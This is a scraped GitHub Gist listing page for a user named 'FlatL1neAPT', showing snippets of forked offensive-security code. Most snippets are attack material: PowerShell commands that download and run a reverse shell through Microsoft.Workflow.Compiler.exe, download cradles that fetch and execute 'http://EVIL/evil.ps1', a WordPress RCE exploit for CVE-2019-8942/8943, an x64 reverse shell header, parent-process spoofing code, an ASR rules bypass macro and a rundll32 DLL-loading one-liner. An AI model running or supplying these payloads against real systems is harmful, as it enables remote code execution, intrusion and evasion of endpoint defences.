Skip to content

Instantly share code, notes, and snippets.

🏠
Working from home

FlatL1ne FlatL1neAPT

View GitHub Profile
@FlatL1neAPT
FlatL1neAPT / VitaLoader.java
Created Mar 11, 2019 — forked from xerpi/Now has a repository
Ghidra Vita loader script
View VitaLoader.java
//@author Sergi Granell
//@category _NEW_
//@keybinding
//@menupath
//@toolbar
/*
* This script depends on the yamlbeans library.
* Download the JAR from https://github.com/EsotericSoftware/yamlbeans/releases
* and add the path to Ghidra's "Edit" -> "Plugin Path..." configuration.
View reverse-tcs-auth-shell.nasm
; =================================================
; Password protected x64 TCP Reverse Shell
; Author: Alan Vivona
; =================================================
global _start
; Syscall numbers
syscalls.socket equ 0x29
syscalls.bind equ 0x31
@FlatL1neAPT
FlatL1neAPT / PowerShell_Command.txt
Created Mar 5, 2019 — forked from BankSecurity/PowerShell_Command.txt
Reverse Shell Powershell command Abusing Microsoft.Workflow.Compiler.exe
View PowerShell_Command.txt
64bit:
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell
32bit:
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsof
@FlatL1neAPT
FlatL1neAPT / wordpress-rce.js
Created Mar 3, 2019 — forked from allyshka/wordpress-rce.js
WordPress <= 5.0 exploit code for CVE-2019-8942 & CVE-2019-8943
View wordpress-rce.js
var wpnonce = '';
var ajaxnonce = '';
var wp_attached_file = '';
var imgurl = '';
var postajaxdata = '';
var post_id = 0;
var cmd = '<?php phpinfo();/*';
var cmdlen = cmd.length
var payload = '\xff\xd8\xff\xed\x004Photoshop 3.0\x008BIM\x04\x04'+'\x00'.repeat(5)+'\x17\x1c\x02\x05\x00\x07PAYLOAD\x00\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00`\x00`\x00\x00\xff\xdb\x00C\x00\x06\x04\x05\x06\x05\x04\x06\x06\x05\x06\x07\x07\x06\x08\x0a\x10\x0a\x0a\x09\x09\x0a\x14\x0e\x0f\x0c\x10\x17\x14\x18\x18\x17\x14\x16\x16\x1a\x1d%\x1f\x1a\x1b#\x1c\x16\x16 , #&\x27)*)\x19\x1f-0-(0%()(\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11\x00\xff\xc4\x00\x14\x00\x01'+'\x00'.repeat(15)+'\x08\xff\xc4\x00\x14\x10\x01'+'\x00'.repeat(16)+'\xff\xda\x00\x08\x01\x01\x00\x00?\x00T\xbf\xff\xd9';
var img = payload.replace('\x07PAYLOAD', String.fromCharCode(cmdlen) + cmd);
@FlatL1neAPT
FlatL1neAPT / bad_sequel.py
Created Jan 29, 2019 — forked from 3xocyte/bad_sequel.py
PoC MSSQL RCE exploit using Resource-Based Constrained Delegation
View bad_sequel.py
#!/usr/bin/env python
# for more info: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
# this is a rough PoC
# requirements for RCE:
# - the attacker needs to either have or create an object with a service principal name
# - the MSSQL server has to be running under the context of System/Network Service/a virtual account
# - the MSSQL server has the WebClient service installed and running (not default on Windows Server hosts)
# - NTLM has to be in use
View process_spoof.c
/* x86-64-w64-mingw32-gcc process_spoof.c -o spoof.exe */
/* spoof.exe explorer.exe calc.exe */
#include <windows.h>
#include <tlhelp32.h>
#define PROC_THREAD_ATTRIBUTE_PARENT_PROCESS 0x00020000
typedef struct _STARTUPINFOEX {
STARTUPINFO StartupInfo;
LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList;
View DownloadCradles.ps1
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
View keybase.md

Keybase proof

I hereby claim:

  • I am FlatL1neAPT on github.
  • I am underground (https://keybase.io/underground) on keybase.
  • I have a public key whose fingerprint is E8D6 2068 1BD8 05A9 874A F718 02BC 1C2C 0C68 EDD1

To claim this, I am signing this object:

@FlatL1neAPT
FlatL1neAPT / ASR Rules Bypass.vba
Created Jan 11, 2019 — forked from infosecn1nja/ASR Rules Bypass.vba
ASR rules bypass creating child processes
View ASR Rules Bypass.vba
' ASR rules bypass creating child processes
' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction
' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule
Sub ASR_blocked()
Dim WSHShell As Object
Set WSHShell = CreateObject("Wscript.Shell")
WSHShell.Run "cmd.exe"
End Sub
@FlatL1neAPT
FlatL1neAPT / excel.bat
Created Oct 28, 2018 — forked from Ridter/excel.bat
Execute DLL via the Excel.Application object's RegisterXLL() method
View excel.bat
REM rundll32 mshtml.dll HTA one-liner command:
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('C:\\Windows\\Temp\\evilDLL.log');this.close();
You can’t perform that action at this time.